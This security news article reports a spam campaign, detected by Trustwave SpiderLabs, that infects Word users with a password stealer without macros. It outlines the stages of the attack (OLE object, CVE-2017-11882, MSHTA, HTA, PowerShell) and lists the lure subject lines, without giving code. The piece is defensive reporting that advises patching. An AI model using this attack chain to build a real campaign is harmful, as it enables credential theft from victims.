Microsoft Word logo

Spam distributors are using a new technique to infect users with malware, and while this attack relies on having users open Word documents, it does not involve users having to allow the execution of macro scripts.

This new macro-less technique is currently under active exploitation, being detected by Trustwave SpiderLabs researchers in an ongoing malware campaign.

The company says crooks are using this multi-phase, no-macros technique to infect users with a password stealer. Currently, evidence suggests only one group is using this novel trick, albeit this will surely be adopted by others.

New technique's exploitation chain

The actual exploitation chain is detailed below and relies on a large number of resources, such as DOCX, RTF, HTA, VBScript, and PowerShell.

⏩  A victim receives a spam email with a DOCX file attachment.
⏩  Victim downloads and opens the DOCX file.
⏩  DOCX file contains an embedded OLE object.
⏩  OLE object downloads and opens an RTF (disguised as a DOC) file.
⏩  DOC file uses CVE-2017-11882 Office Equation Editor vulnerability.
⏩  Exploit code runs an MSHTA command line.
⏩  MSHTA command line downloads and runs an HTA file.
⏩  HTA file contains a VBScript that unpacks a PowerShell script.
⏩  PowerShell script downloads and installs the password stealer.
⏩  Malware steals passwords from browsers, email and FTP clients.
⏩  Malware uploads data to a remote server.

New Word attack modus operandi

Trustwave says it seen this trick being used with malicious documents arriving via emails with the following subject lines, albeit many will likely change by tomorrow or next week.

TNT STATEMENT OF ACCOUNT – {random numbers}...............
Request for Quotation (RFQ) - < {random numbers} >
Telex Transfer Notification

The only way to stay safe if users somehow break this new technique's exploitation chain. The easiest way is to keep Windows and Office up to date.

Microsoft's January 2018 Patch Tuesday security updates included a patch that removed part of the Equation Editor's functionality in order to mitigate CVE-2017-11882.

IOCs are available in the Trustwave report detailing this new attack.